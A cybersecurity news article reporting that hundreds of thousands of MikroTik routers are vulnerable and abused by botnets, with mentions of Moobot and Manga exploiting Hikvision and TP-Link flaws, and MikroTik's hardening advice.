The researchers stated that “these technologies are both strong and often exceedingly vulnerable.” “As a result, threat actors have commandeered MikroTik devices for anything from DDoS attacks to command-and-control (also known as ‘C2’), traffic tunnelling and more.”
According to cybersecurity firm Eclypsium reported that,”China, Brazil, Russia, Italy, and Indonesia had the most afflicted devices, with the United States coming in eighth.”
At least 300,000 IP addresses associated with MikroTik devices were discovered to be vulnerable to various remotely exploitable security flaws, which the prominent router and wireless ISP equipment supplier has now addressed.
MikroTik devices are an attractive target, not least because there are more than two million of them in use around the world, creating a large attack surface that threat actors can use to launch a variety of attacks.
MikroTik routers aren’t the only devices that have become part of a botnet. Fortinet researchers showed this week how the Moobot botnet is growing its network and using infected devices to perform distributed denial-of-service (DDoS) attacks by exploiting a known remote code execution (RCE) vulnerability in Hikvision video surveillance equipment (CVE-2021-36260).
The researchers added that “An attacker might possibly collect sensitive information by employing well-known tactics and technologies, such as SMS over WiFi to steal MFA credentials from a distant user. Enterprise traffic might be tunnelled to another location, or malicious content could be inserted into legitimate traffic, as in past assaults”.
Instructions from MikroTik such as :
- Keep your MikroTik device up to date with regular upgrades.
- Do not open access to your device from the internet side to everyone, if you need remote access, only open a secure VPN service, like IPsec.
- Use a strong password and even if you do, change it now!
- Don’t assume your local network can be trusted. Malware can attempt to connect to your router if you have a weak password or no password.
- Inspect your RouterOS configuration for unknown settings including:
- System -> Scheduler rules that execute a Fetch script. Remove these.
- IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
- L2TP client named “lvpn” or any L2TP client that you don’t recognize.
- Input firewall rule that allows access for port 5678.
- Block domains and tunnel endpoints associated with the Meris botnet.
The operators of a botnet known as Manga aka Dark Mirai are actively abusing a recently disclosed post-authenticated remote code execution vulnerability (CVE-2021-41653) to hijack TP-Link routers and co-opt them into their network of infected devices.
Finally the researchers concluded that ,”Users and businesses are exposed to a wide range of threats due to vulnerabilities in network equipment. For attackers, highly capable equipment like MikroTik routers are a very valuable weapon. These gadgets, on the other hand, frequently go unnoticed and are rarely updated or handled correctly. Organizations must be able to identify and assess this major attack surface both in the company and in the remote work settings of its employees.”